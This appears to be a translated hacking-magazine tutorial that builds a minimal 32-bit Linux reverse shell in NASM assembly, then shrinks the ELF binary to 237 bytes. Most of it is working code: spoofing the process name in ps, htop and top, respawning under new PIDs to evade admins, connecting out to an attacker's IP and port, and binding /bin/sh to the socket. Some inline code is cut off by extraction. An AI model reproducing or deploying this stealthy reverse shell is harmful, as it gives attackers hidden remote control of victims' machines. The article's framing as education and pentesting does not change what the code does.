What for?
Plenty of small reverse shells are available on the Internet: tiny shell](https://github.com/creaktive/tsh/blob/master/tsh.c), prism, and others. Reverse shells written in C are only tens to hundreds of kilobytes in size. So, what’s the point to create another one?
The point is simple. This is an educational article: similar to the development of kernel rootkits, which is one of the most intuitive ways to understand the structure of the Linux kernel, writing a reverse shell with additional functionality and restrictions on the executable file size enables you to explore some unexpected Linux features, including those related to ELF files, their loading and execution, resource inheritance in child processes, and linker operations. Along the way, plenty of exciting discoveries and curious hacks await you. And in the end, you will get a bonus: an operational tool that you can additionally refine, polish, and use in pentesting. Let’s start!
info
The resultant program is available on GitHub.
warning
All information provided in this article is intended for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication.
Terms of reference
In addition to the connection to a given port on a given host, your reverse shell must support the following functions:
- set its name at startup (to be less detectable);
- change the process identifier on a regular basis (to be more elusive); and
- be as small as possible (to make your task more interesting).
First, you have to select the language. Since one of your main goals is to reduce the binary size, two options come to mind: C and assembly. Indeed, C makes it possible to create tiny (by modern standards) Hello Worlds (some 17 and ~800 KB for dynamic and static linking, respectively, vs. 2 MB in Go); however, as you probably know, when you compile C code, additional code is generated. This code is responsible for:
- execution of global constructors and destructors, if any;
- correct passing of arguments to
main(
; and) - transferring control from
__libc_start_main(
to) main(
.)
Constructors and destructors
Arrays of constructor functions and destructor functions are called before and after main(
, respectively. Their code is stored in separate sections – unlike the ‘normal’ code stored in .
. Such functions are used inter alia for various initializations in shared libraries or to set buffering parameters in apps interacting over the network (e.g. in CTF tasks). To ensure that a function falls into one of these sections, you must specify __attribute__ ((
or __attribute__ ((
prior to defining the function.
In some cases, the sections storing these functions can be named .
/.
/.
and .
/.
/.
. Generally speaking, all of them perform the same function, and their differences are irrelevant for the purposes of this article. More information on global constructors and destructors can be found on wiki.osdev.org.
Also, the output executable file may contain sections with debugging and other information (e.g. symbol names, compiler version, etc.); this information isn’t directly required for its execution and operation, but it increases the file size, sometimes significantly. Such sections will be discussed in more detail a little later.
This ‘harness’ is inextricably linked with C binaries (at least in Linux). But for your purposes, this is just ballast to be mercilessly disposed of. Therefore, your reverse shell should be written in the great and terrible assembly language (of course, for x86). The plan is as follows: first, you write operational code and then you start reducing its size.
Coding
I suggest to use NASM. You can take the simplest asm reverse shell as a basis. In my humble opinion, 32-bit code is more preferable: instructions in this mode are shorter, and you don’t lose the required functionality since your primary objective is to connect to the server and run the shell; then the shell will operate in the 64-bit mode.
The code must perform the following operations:
- at startup, the reverse shell changes its first execution argument (these arguments are displayed in
ps
, andhtop
); - it also changes the short name (it’s displayed by the
top
utility); - then it tries to connect to the server. If the attempt fails, a child process is created, the parent one terminates, the timeout is waited, and the connection attempt is repeated; and
- on successful connection, the shell runs
/
whosebin/ sh stdin
,stdout
, andstderr
are linked with the socket communicating with the server. The process name is spoofed as well.
So, what then is my name to you?
In Linux, there are two ‘entities’ that store the name associated with a process. Let’s call them ‘full’ and ‘short’ names. Both can be accessed via /
: the full one is in /
; while the short one, in /
(comm for command).
According to its description, the short name contains the name of the executable file without the path to it. This name is stored in the kernel structure task_struct
describing the process (in kernel terms, task), and its length is limited to 16 characters, including the null byte.
The full name contains the program arguments (i.e. *argv[
): the name of the executable file as it was specified at startup is stored in the zeroth element while the passed arguments (if any), in the rest of the elements.
It’s pretty easy to change the short name. You can use the prctl(
system call for this purpose. With prctl(
, a process or thread can perform various operations with its name, privileges (capabilities), memory areas, seccomp mode, etc. The number of the required operation is passed as the first argument followed by the rest of the parameters whose number can vary. You are interested in the operation PR_SET_NAME
where the pointer to the new name is passed as the second argument. However, if the name, including the null byte, is longer than 16 characters, it will be truncated.
In other words, to change the short name, you have to call prctl(
where NEW_ARGV
contains the new name’s address. Execute the following code:
mov eax, 0xac ; NR_PRCTL mov ebx, 15 ; PR_SET_NAME mov ecx, NEW_ARGV int 0x80 ; syscall interrupt ...NEW_ARGV: db "s0l3g1t", 0
info
Plenty of useful information about system calls can be found in man
. It also contains two tables for platforms and ABIs supported by Linux; they store instructions for system calls and registers used to pass arguments and return values. Note that the calling conventions are different from those used in usermode apps (at least on x86).
Now you can rewrite argv[
. The following piece of code performs operations similar to strncpy(
in C (the address of argv[
was already pushed onto the stack):
mov edi, [esp] ; edi = &argv[0] mov esi, NEW_ARGV mov ecx, _start - NEW_ARGV ; ecx = strlen(NEW_ARGV) + NULL-byte _name_loop: movsb ; edi[i] = esi[i] ; i+=1 loop _name_loop ...NEW_ARGV: db "s0l3g1t", 0_start:...
This address is placed in edi
(destination index register). The address of the name you set ("s0l3g1t"
) is placed in esi
(source index register); while its length, including the null byte, in ecx
. However, it turns out that if the original argv[
("./
) was longer than the new one, then, despite the presence of the terminating null byte, the ps
output will be as follows.
That’s not good. Let’s try to fill it with zeros first and then overwrite.
That’s better: the ps
output contains nothing suspicious! But there is still some room for improvement. What does the manual say? According to man
(subsection /
):
Furthermore, a process may change the memory location that this file refers via prctl(2) operations such as PR_SET_MM_ARG_START.
In addition to thePR_SET_MM_ARG_START
parameter, man
contains PR_SET_MM_ARG_END
(these options are available starting from Linux 3.5). It seems that the second parameter is exactly what you need! Too bad: to perform prctl(
operations affecting the process memory, you need the CAP_SYS_RESOURCE
privilege (otherwise it would be too easy!). And to grant it, superuser rights are required…
For the same reason, if you ‘explicitly’ replace the address of the argv[
string array on the stack, this won’t change the contents of /
: Linux stores addresses of the beginning and end of the memory region storing the process arguments, and the content of this particular memory region is displayed. The same is true for environment variables as well. Therefore, xxd
displays zeros.
Let’s assume that your reverse shell is always run on behalf of a regular user, and there is no way to grant the CAP_SYS_RESOURCE
privilege to it. Therefore, you simply fill the entire original argv[
with zeroes and then overwrite it with your own one. How often does one check the process name in /
using xxd
?
Now all you have to do is find out how to spoof the name /
(because after calling execve(
to run the shell, its *argv[
will show /
to the admin in the ps
and htop
outputs and in /
). Fortunately, this problem is easy to solve: you just pass your own argv[
to this syscall as the second argument. Keep in mind that the passed pointer points to an array of arguments (strings) that must be terminated with a null pointer. Therefore, before pushing the NEW_ARGV
address onto the stack, 0 must be pushed there:
xor eax, eax push dword 0x0068732f ; push "/sh" push dword 0x6e69622f ; push /bin (="/bin/sh") mov ebx, esp ; ebx = ptr to "/bin/sh" into ebx push edx ; edx = 0x00000000mov edx, esp ; **envp = edx = ptr to NULL addresspush ebx ; pointer to /bin/shpush 0push NEW_ARGV mov ecx, esp ; ecx points to shell's argv[0] ( &NEW_ARGV ) mov al, 0xb int 0x80 ; execve("/bin/sh", &{ NEW_ARGV, 0 }, 0)
But now you cannot change the short name with prctl(
since you are working from a shell where syscalls cannot be made directly. However, there are other interesting ways to do this.
Starting over
To connect to a server, you have to create a socket, fill the struct
structure containing the address to connect to, and connect to it.
A socket is the connection endpoint in Linux; unlike unix and netlink sockets, this is not necessarily a network connection. When you create a socket, you must specify the address family or the protocol family (currently, the first one contains aliases of the second one) it will belong to, the socket type (streaming, datagram, raw, etc.), and the protocol (it depends on the family, see man
). In this particular case, you need a stream (TCP, SOCK_STREAM
) internet socket (the AF_INET
family), and the protocol will be selected automatically when you pass 0:
mov al, 0x66 ; 0x66 = 102 = socketcall()push ebx ; 3rd arg: socket protocol = 0mov bl, 0x1 ; ebx = 1 = socket() functionpush byte 0x1 ; 2nd arg: socket type = 1 (SOCK_STREAM)push byte 0x2 ; 1st arg: socket domain = 2 (AF_INET)mov ecx, esp ; copy stack structure's address to ecx (pointer)int 0x80 ; eax = socket(AF_INET, SOCK_STREAM, 0)
info
On some platforms, including, x86_32, a single system call socketcall(
is used for socket functions instead of separate syscalls socket(
, bind(
, connect(
, etc.; its first argument is the number of the required function. These numbers are defined in the Linux kernel.
The struct
parameter is a kind of ‘base class’ for definitions of various protocols’ addresses. It has only two fields:
/* Structure describing a generic socket address. */struct sockaddr { unsigned short sa_family; /* Common data: address family and length. */ char sa_data[14]; /* Address data. */};
The value of the first field must match the family of the previously created socket. The second field describes the address the socket will be associated with. As you know, different protocols have different address formats, including sockaddr_in
/sockaddr_in6
(internet sockets), sockaddr_un
(unix sockets), etc. But all of them are a kind of wrappers for the sockaddr
structure and can be easily cast to the sockaddr
type to support a single API for socket functions. For instance, sockaddr_in
divides the sa_data
field into an IP address and a port number, thus, leaving eight unused bytes (see also man
):
struct sockaddr_in { sa_family_t sin_family; /* address family: AF_INET */ in_port_t sin_port; /* port in network byte order */ struct in_addr sin_addr; /* internet address */ unsigned char sin_zero[8]; /* Pad to size of 'struct sockaddr' */};/* Internet address */struct in_addr { uint32_t s_addr; /* address in network byte order */};
Your objective is to correctly form this structure on the stack and pass its address to the connect(
system call. As said above, the port (REV_PORT
) and the IP address (REV_IP
) in this structure must have the network byte order (i.e. Big Endian (MSB)). The below code calls connect(
where socketfd
was obtained earlier:
mov al, 0x66 ; 0x66 = 102 = socketcall()push dword REV_IP ; Remote IP address push word REV_PORT ; Remote port push word 0x0002 ; sin_family = 2 (AF_INET) mov ecx, esp ; ecx = ptr to *addr structure push byte 16 ; addr_len = 16 (structure size) push ecx ; push ptr of args structure push ebx ; ebx = socketfd mov bl, 0x3 ; ebx = 3 = connect() mov ecx, esp ; save esp into ecx, points to socketfd int 0x80 ; eax = connect(socketfd, *addr[2, PORT, IP], 16) = 0 on success
If the connection attempt fails, the reverse shell should try again after a while. This is simple: you check the return code received in eax
; in case of a successful connection, it’s 0; in case of an error, it’s 1. Prior to a new connection attempt, the reverse shell must create a child process and terminate the parent process so that its PID changes. Important: it’s the child process that will sleep. For simplicity purpose, you can set the timeout to five seconds (although a random value varying in a certain range would be better).
Setting up the sleep function requires some time and effort. You cannot just call sleep(
because the syscall you need takes two pointers to structures: the first one describes the sleep duration, while the second one records the remaining time if the sleep was interrupted (e.g. by an incoming signal):
int nanosleep(const struct timespec *req, struct timespec *rem)
However, the manual claims that rem
can be equal to NULL
, which is good. All you have to do is write to the req
structure the seconds and nanoseconds during which the function should sleep:
struct timespec { time_t tv_sec; /* goes to 'long int' */ long tv_nsec;};
Both numbers belong to the long
type that occupies 4 bytes on x86_32. So, you have to fill the structure and make the syscall as shown below (and clean up the stack afterwards):
mov eax, NR_NANOSLEEPpush dword 0 ; nsecpush dword 2 ; secmov ebx, esp ; ebx = struct timespec *reqxor ecx, ecx ; ecx = struct timespec *rem = NULLint 0x80add esp, 8 ; cleanup
The output should be as follows.
Diet for an elf
Congrats! You’ve got an operational reverse shell! What’s its size? If you build the binary using nasm
, it will be some 5 KB.
info
This article is largely inspired by a study with a self-explanatory second name: Size Is Everything (also available on GitHub). The idea is to get rid of everything unnecessary in an ELF file, examine the ELF file format and Linux internals, and finally get an operational binary. This file does nothing, only returns the code “42”. Spoiler: the author managed to squeeze it to 45 bytes from the initial 4 KB!
So, your shell is currently 4912 bytes in size. Time to examine its ‘elven’ nature.
Building a tiny elf
Any hacker pentester familiar with C is aware that programs written in this language start with main(
since gcc
expects this function to be in the code. In fact, it’s not quite so: the execution of an executable file starts from the entry point, and this is usually the _start(
function responsible for the preliminary preparation and transfer of control to main(
.
You assemble the .
file using NASM, and it produces a ‘Relocatable’ ELF file (normally, such files have the .
extension). ELF files are produced when a project is assembled from several source files according to the scheme “one source – one relocatable elf” (by the way, they can be written in more than one language).
Relocatable ELF files contain sections with data and code that can be linked against other files to create an executable binary. Actually, this is what the linker does. In this particular case, this is ld
. It expects a function named _start
to be present in one of the input files to make it the entry point.
A hollow inside
After executing the above commands, you get a file where the code (section .
) starts with a physical offset (offset in the file on disk) of 0x1000
. This suspiciously resembles the page size, and before it, there is only a space filled with zeros. By the way, this piece of code occupies as much as 4 KB, which is totally unacceptable!
Let’s see what linker options are responsible for this. Based on the description of the -n
key (Do
), this is exactly what you need.
912 bytes! Much better. The code now starts with a physical offset of 0x60
. What’s next? Time has come to play with the sections.
info
You can review the history of commits to examine the source code at different development stages.
Who needs those SHTs?
SHT is a Section Header Table (although more often you can find just a “section table” or “section headers”). It contains the names of all sections in the file, and you can view them by running readelf
.
Where do the other sections come from taking that the source code had only the .
section? Remember how the executable file was assembled. For instance, to enable ld
to find the _start(
, function, information about it must be present somewhere. It’s stored in the symbol table, in the .
file, in the .
and .
sections.
As you can see, all your labels specified in the source code are present there. But an executable file doesn’t necessarily have to contain a symbol table. Therefore, you can apply the strip
command to it or use the linker key -s
to get rid of the symbols in it. However, if you ‘strip’ symbols in a relocatable file, the linker won’t be able to find the entry point and assemble an executable elf, which is logical. Overall, this trick allows to reduce the size by a little more than half (to be specific, by 468 bytes).
Moreover, the correct operation of a binary doesn’t require the information about its sections at all! The most straightforward way to remove them from the executable file is to use the command dd
. Fortunately, the section table is located at the end of the file, so this operation isn’t difficult. In this particular case, it starts at offset 0x130
(304).
But to get rid of the information indicating that there were sections in the file, you should not only cut off the SHT at the end of it, but also fill the fields in the ELF file header containing the offset of the section table, the size of its records, and their number (e_shoff
, e_shentsize
, and e_shnum
in ElfN_Ehdr
, respectively) with zeroes. In the above screenshot, these fields are underlined. For detailed instructions on how to get rid of section headers, see the article ELF – No Section Header? No Problem; also see the Oracle blog for more information about the sections.
info
The structure of an ELF header is shown in this diagram. I strongly recommend to review it if you have read this far. Just keep in mind that it depicts a 32-bit ELF, and the sizes of individual fields in it are smaller than in a 64-bit one.
Now your reverse shell is 304 bytes in size. Is it possible to reduce it further?
‘Compressing’ instructions
This trick is well-known to hackers pentesters who have to write shellcodes for buffers with a limited size. The point is that different instructions on x86 have different lengths, and the same thing can often be expressed in the assembly language in different ways. Below is one of my favorite examples.
Review your code from this perspective. Of course, its readability will most likely deteriorate, but this won’t affect the shell’s workability in any way! First of all, don’t write small numbers directly into registers. In this particular case, these are mostly system call numbers.
Replacing instructions like mov
with push
will really help with syscalls having small numbers; however, for numbers greater than 0x7f
, push
will take 5 bytes instead of two, and one more byte is used by pop
. As you can see, offsets in the reverse shell are much greater than this value; therefore, if you try to save on them this way, you would lose more than you gain. In some cases, instead of placing 1 into the register directly, you can simply increment it (important: don’t forget to set it to zero it first). Just compare!
Also, you don’t need some of the register initialization instructions because initially they are all set to zero. The specific values of nanoseconds spent on sleep and the exit code for unsuccessful connection attempts can be neglected and removed, too. The way you push the sockaddr_in
structure onto the stack can also be reduced in size: instead of using two separate instructions for the address family and port number (that in total occupy 4 bytes in the structure), you can push them onto the stack at once.
As a result, the code shrinks by additional 25 bytes; now its size is 279 bytes. Its further reduction requires creativity and patience.
Bonus: sploiting headers
An ELF header includes a space filled by default with zeros, and the system doesn’t check these values when the file is loaded and executed (although certain tools do this). This space is located in the very first line, e_ident
, and starts at the tenth byte (EI_PAD
). The ninth byte, EI_ABIVERSION
, that describes the ABI version for object files is irrelevant for you since your shellcode isn’t written for the ARM architecture. Therefore, you can safely use 8 bytes starting from the eighth one in the file. This is just enough for"/
. But how to correctly specify the offset to it in the code without calculating or changing it manually?
The answer is: you have to change the build parameters. Since you are going to edit the ELF header generated by the linker, you cannot use it. For such situations, NASM allows to specify the ‘raw’ format of the output file: nasm
. Then it builds the file as defined in the source code, without adding any headers to it. You have to specify the address where this stuff should be loaded so that NASM can correctly calculate the entry point and other offsets. For this purpose, the org
directive is specified.
There is one more thing that you can change without hampering the binary’s workability: the previously zeroed information about the section table. The ELF header contains the following fields in a row:
-
e_shoff
,e_flags
(8 bytes) -
e_shentsize
,e_shnum
,e_shstrndx
(6 bytes)
The e_flags
field does not describe SHT; according to the documentation, it’s intended for certain processor flags. But since none of them are currently defined, you can safely use 8 bytes from the first chain of fields. NEW_ARGV
will perfectly fit there.
The second chain can be used to store the code that terminates the process in case of an unsuccessful connection (it occupies 5 bytes); while jmp
can be put in its original place, thus, saving 3 more bytes. Your manually assembled header now looks as follows:
org 0x08048000ehdr: ; Elf32_Ehdr db 0x7F, "ELF" ; e_ident db 1, 1, 1, 0BIN_SH: db "/bin/sh", 0e_type: dw 2 ; e_type dw 3 ; e_machine dd 1 ; e_version dd _start ; e_entry dd phdr - $$ ; e_phoffNEW_ARGV: db "s0l3git", 0 ; e_shoff, e_flags dw ehdrsize ; e_ehsize dw phdrsize ; e_phentsize dw 1 ; e_phnum_exit: push NR_EXIT ; e_shentsize pop eax ; e_shnum ; exit_code = random :D ; e_shstrndx int 0x80 db 0ehdrsize equ $ - ehdrphdr: ; Elf32_Phdr dd 1 ; p_type dd 0 ; p_offset dd $$ ; p_vaddr dd $$ ; p_paddr dd filesize ; p_filesz dd filesize ; p_memsz dd 5 ; p_flags dd 0x1000 ; p_alignphdrsize equ $ - phdr ...
After all these manipulations, the binary is 254 bytes in size. What else can be done? For instance, you can try to make the ELF header and the Program Header Table overlap (as suggested in the above-mentioned article “Size Is Everything”). This is possible because the last 8 bytes of the ELF header are identical to the first 8 bytes of the PHT, while the overlapped ELF bytes with new values are not critical for the file execution. But in this case, you will have to return the _exit
code put previously in the header to its original place. After playing a bit with registers, you get a reverse shell 237 bytes in size. This is roughly one twentieth of its original size!
Lessons learnt
First, a reverse shell can be ridiculously tiny if necessary. Second, 32-bit processes can execute execve(
and become 64-bit ones. Headers in ELF files can overlap; if it’s done properly, the file will work just fine. And if a process changes its name, it may leave traces.
Your reverse shell is fully operational, and you can add more functionality to it. For instance, teach the shell to ignore signals, scan ports, encrypt traffic… But that’s another story. Good luck in your endeavors!